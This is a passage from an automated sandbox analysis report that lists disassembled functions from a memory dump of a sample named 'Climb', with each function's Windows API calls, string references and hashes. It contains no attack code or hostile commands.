DllGetClassObject, xrefs: 00117BA9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: e8b3e2744f172b0678021e5444484077c18908fa75bd409733859753d9f4d6c0
Instruction ID: e6f72806319f4c875e9501f54d7f6c6dc205c370c9c12e5e7af5c628d3e42813
Opcode Fuzzy Hash: e8b3e2744f172b0678021e5444484077c18908fa75bd409733859753d9f4d6c0
Instruction Fuzzy Hash: EA419DB1604205EFDB19CF64D884BDA7BB9EF54310B1080A9AC0A9F385D7B0DA84CBE0

Function 00144818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001448D1
IsMenu.USER32(?), ref: 001448E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0014492E
DrawMenuBar.USER32 ref: 00144941

Strings

0, xrefs: 00144825

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 7e643b9f501327217174bfc51a1c6dadc9d028d9f26b37b6ca5dd1c4f2e3ab9b
Instruction ID: 6c76674312f5234f5f69f833696c0fca5e3b284575c19af83846e1b87acd3584
Opcode Fuzzy Hash: 7e643b9f501327217174bfc51a1c6dadc9d028d9f26b37b6ca5dd1c4f2e3ab9b
Instruction Fuzzy Hash: AB412975A01209AFDF10CF55D884AAABBB9FF0A328F044129E9559B260D730AD55DB60

Function 0011272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001127B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001127C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 001127F6

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

Strings

ListBox, xrefs: 00112772
ComboBox, xrefs: 0011273D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: fd0a6fbd71333443b1f3f7bae3f8e39d5453c3b8b74a1de81e633390e21a8184
Instruction ID: e3e44cc520df4bba00b8d74cc185a89dc6627b5c9d22350f0499beefcebce7af
Opcode Fuzzy Hash: fd0a6fbd71333443b1f3f7bae3f8e39d5453c3b8b74a1de81e633390e21a8184
Instruction Fuzzy Hash: 19210575A00104BFDB09ABA0DC46DFF77B8DF46760F108139F421A71E2DB78498AC660

Function 001439B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00143A29
LoadLibraryW.KERNEL32(?), ref: 00143A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00143A45
DestroyWindow.USER32(?), ref: 00143A4D

Strings

SysAnimate32, xrefs: 00143A04

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 5b1424ae8b078c8afd238ae97bb84b2b0dbb4380fb61b76c06bf1603859e9963
Instruction ID: 83e72ab24242fa6ac146f36718f16423de4ef298e29e0861a5e3fa554c5cf6a3
Opcode Fuzzy Hash: 5b1424ae8b078c8afd238ae97bb84b2b0dbb4380fb61b76c06bf1603859e9963
Instruction Fuzzy Hash: 9C219A71640209ABEF108F64EC84FAB77E9EB49368F205228FAA1D31F0C771CD919760

Function 000D50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000D508E,?,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002), ref: 000D50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000D5110
FreeLibrary.KERNEL32(00000000,?,?,?,000D508E,?,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002,00000000), ref: 000D5133

Strings

CorExitProcess, xrefs: 000D5108
mscoree.dll, xrefs: 000D50F6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3018836647a0c260ab543ff4b4620e695a55858deedf8c62ff792e6c1072f23a
Instruction ID: eba7f3979c755aaa3474d9d88e61fb18c2e327bd56f64efabc111864f30a1e8a
Opcode Fuzzy Hash: 3018836647a0c260ab543ff4b4620e695a55858deedf8c62ff792e6c1072f23a
Instruction Fuzzy Hash: BDF04439A00208BBDB115F94EC49BADBFF5EF08752F0000A5FC09A6660DB755984CA95

Function 0010E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0010E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0010E797
FreeLibrary.KERNEL32(00000000), ref: 0010E7BD

Strings

GetSystemWow64DirectoryW, xrefs: 0010E791
X64, xrefs: 0010E680

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 81b1406694292301f51c109526159953f65148d840013fdc61af1bf16eaaab4b
Instruction ID: 507e13aaa71d5ffeae01c52b7f361e1b8c4fd6a0063bf4737208a9f945ebc9b5
Opcode Fuzzy Hash: 81b1406694292301f51c109526159953f65148d840013fdc61af1bf16eaaab4b
Instruction Fuzzy Hash: 3FE061759025119FEB355760AC88F6D32647F15F01F150998FC81F20A0DBB0CD84CF95

Function 000B663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000B665C
FreeLibrary.KERNEL32(00000000,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B666E

Strings

kernel32.dll, xrefs: 000B6642
Wow64DisableWow64FsRedirection, xrefs: 000B6656

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: bc3c2f2aba66c5a069707efef76e8115e2b34bedeffd0834be486deb2b2ad93e
Instruction ID: e3d1705a9aa40937362e72b668b3bfabf2c953dde9414872ecf5c60c6350534c
Opcode Fuzzy Hash: bc3c2f2aba66c5a069707efef76e8115e2b34bedeffd0834be486deb2b2ad93e
Instruction Fuzzy Hash: 46E0C23A70262257D6622725BC0CBAE77A89F83F26B050219FD04E2220DFA8CC41C5E5

Function 000B6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000B6622
FreeLibrary.KERNEL32(00000000,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6635

Strings

kernel32.dll, xrefs: 000B6609
Wow64RevertWow64FsRedirection, xrefs: 000B661C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8e37d3081d1639cf2374085d46cbd549476d291ee5fb6388b8c09d10f9632c18
Instruction ID: b7fdcf0f155f694fff21061f275b331dba6ae41c3a8e05fb7d0a604b37cef9ed
Opcode Fuzzy Hash: 8e37d3081d1639cf2374085d46cbd549476d291ee5fb6388b8c09d10f9632c18
Instruction Fuzzy Hash: 6FD05B39612531578A7227297C18ACF7B549FD3F113050055FC04A2334CF65CD41CADD

Function 00123306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001235C4
DeleteFileW.KERNEL32(?), ref: 00123646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0012365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0012366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0012367F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: eb76e4aee50d67fdebed876f0c4979ae7cc632c856b7ce4f209ad1ce5e5916dd
Instruction ID: 3a826ee39526c9f3d8f67811f6d8e1f4de0b078c01a65a70337d1725acd7c506
Opcode Fuzzy Hash: eb76e4aee50d67fdebed876f0c4979ae7cc632c856b7ce4f209ad1ce5e5916dd
Instruction Fuzzy Hash: 8FB17F72E00229ABDF15DBA4DC85EDEBB7CEF48300F0040A6F519A6252EB359B548B60

Function 0013ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0013AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0013AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0013AEC8
CloseHandle.KERNEL32(?), ref: 0013B09D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 93cd474d5e7eb431f4ddd96f9e4d5d60787da68658cc5d67582522ba829368ca
Instruction ID: 0543ce88d21f1abacbfdf56645e7d22ab7941af76eab0f9f9985cc5dac8714f9
Opcode Fuzzy Hash: 93cd474d5e7eb431f4ddd96f9e4d5d60787da68658cc5d67582522ba829368ca
Instruction Fuzzy Hash: 65A19FB1A04301AFE724DF24C886FAAB7E5AF44710F54885DF5A99B293DB71EC41CB81

Function 0013C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0013C5C3
RegCloseKey.ADVAPI32(?,?), ref: 0013C606
RegCloseKey.ADVAPI32(00000000), ref: 0013C613

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: c1b2d14f6c74d7f24ca2e282a2d40358255ea417fc9c270b5e00e50a1210c014
Instruction ID: 91283dbb768ec21517e9d3934eb916059b2519f01b7823567c9ae6e595b83641
Opcode Fuzzy Hash: c1b2d14f6c74d7f24ca2e282a2d40358255ea417fc9c270b5e00e50a1210c014
Instruction Fuzzy Hash: 4761B371208241EFD714DF24C894E6ABBE5FF84308F54859CF4999B2A2DB31ED46CB91

Function 0011ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0011D7CD,?), ref: 0011E714

Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0011D7CD,?), ref: 0011E72D

Part of subcall function 0011EAB0: GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1

lstrcmpiW.KERNEL32(?,?), ref: 0011ED8A
MoveFileW.KERNEL32(?,?), ref: 0011EDC3
_wcslen.LIBCMT ref: 0011EF02
_wcslen.LIBCMT ref: 0011EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0011EF67

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 5b88f488f2b533b55c897149b422978c4d970a49f146be0ce89531c1913f2733
Instruction ID: 55cfd6e69d147a7df1c5fcb6f19aaed58a31de9aeaec44e0cddc9790c7c75f10
Opcode Fuzzy Hash: 5b88f488f2b533b55c897149b422978c4d970a49f146be0ce89531c1913f2733
Instruction Fuzzy Hash: 4C5153B25083859BC728DBA4D8919DFB3ECAF94300F40093EF585D3192EF75A6C88766

Function 00119517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00119534
VariantClear.OLEAUT32 ref: 001195A5
VariantClear.OLEAUT32 ref: 00119604
VariantClear.OLEAUT32(?), ref: 00119677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001196A2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 9d14abe41984458ab85c3cfc020c33de269e112ea973fddb08ea358f40a1c6ac
Instruction ID: 89c74a81b7d8b785298001080d6996acad1aae6c294eb586863b1f05c6452037
Opcode Fuzzy Hash: 9d14abe41984458ab85c3cfc020c33de269e112ea973fddb08ea358f40a1c6ac
Instruction Fuzzy Hash: 0D516BB5A00619EFCB14CF58C894EAAB7F8FF89314B058169E919DB310E730E951CFA0

Function 00129540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001295F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0012961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00129677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0012969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001296A4

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: a37e91085b1bb3896f5d2eda547ae53a35eae952be0b421e94109b82c6c0013a
Instruction ID: 1a97a7a3b9414b165d8365a09606c7930f89db0df35c002e44e01fba63e8e91b
Opcode Fuzzy Hash: a37e91085b1bb3896f5d2eda547ae53a35eae952be0b421e94109b82c6c0013a
Instruction Fuzzy Hash: A7512735A00215AFCB05DF64D881AAABBF5FF49314F088098E849AB362CB35ED51CF90

Function 00139941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 0013999D
GetProcAddress.KERNEL32(00000000,?), ref: 00139A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00139A49
GetProcAddress.KERNEL32(00000000,?), ref: 00139A8F
FreeLibrary.KERNEL32(00000000), ref: 00139AAF

Part of subcall function 000CF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00121A02,?,75C0E610), ref: 000CF9F1
Part of subcall function 000CF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00110354,00000000,00000000,?,?,00121A02,?,75C0E610,?,00110354), ref: 000CFA18

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 685a412d14a58f83b03ff2863e25dbc367c10d0577da81c1b547539860a4d7db
Instruction ID: 793ce6e3ab18d58e0eeb4be6069d6c2cfbd91ef3093aa903a578934271092da5
Opcode Fuzzy Hash: 685a412d14a58f83b03ff2863e25dbc367c10d0577da81c1b547539860a4d7db
Instruction Fuzzy Hash: 3C512735A042059FDB05DF68C484DEDBBB0FF09314B0581A8E80A9B762D771ED86CB91

Function 001475AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 0014766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00147682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001476AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0012B5BE,00000000,00000000), ref: 001476D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001476FF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 7275004bb32080c9437ce0538fee224e5ff40c23f852c14d055c1bee3e2b086c
Instruction ID: e45496817d7c5d080ffb402e0acdcbac86365f759e12e32223e06a5d239c8ae8
Opcode Fuzzy Hash: 7275004bb32080c9437ce0538fee224e5ff40c23f852c14d055c1bee3e2b086c
Instruction Fuzzy Hash: 5341E435A08514AFEB29DF2CCC48FA57BA6FB0A350F170264F819A72F1D770AD41DA50

Function 000E23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000E2433
_free.LIBCMT ref: 000E2453

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
